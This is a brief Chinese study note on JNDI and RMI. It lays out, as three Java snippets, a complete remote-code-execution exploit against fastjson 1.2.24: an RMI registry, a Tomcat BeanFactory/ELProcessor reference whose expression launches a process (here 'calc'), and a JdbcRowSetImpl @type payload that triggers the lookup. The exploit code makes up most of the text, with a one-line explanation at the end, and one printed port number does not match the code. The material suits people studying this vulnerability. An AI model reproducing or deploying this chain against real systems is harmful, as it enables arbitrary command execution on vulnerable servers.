jndi和rmi学习

　1.程序1启动rmi管理服务

System.out.println("Creating evil RMI registry on port 9527");
LocateRegistry.createRegistry(1111);
System.out.println("======启动Rmi成功!======");
Thread.currentThread().join();

2.程序2注册rmi服务

ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));

ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
Naming.bind("rmi://127.0.0.1:1111/service1", referenceWrapper);
System.out.println("RMI服务启动成功,服务地址:" + "rmi://127.0.0.1:1111/service1");

3.程序3中fastjson序列号中会用到rmi服务，执行注册到rmi服务中的服务,

<fastjson.version>1.2.24</fastjson.version>

String json="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1111/service1\",\"autoCommit\":true}";
JSON.parseObject(json);

4.因为fastjson的parseObject方法中会使用到jndi查找方法，类似this.registry.lookup("rmi://127.0.0.1:1111/service1");，这句就会触发具体远程方法的执行，导致漏洞被利用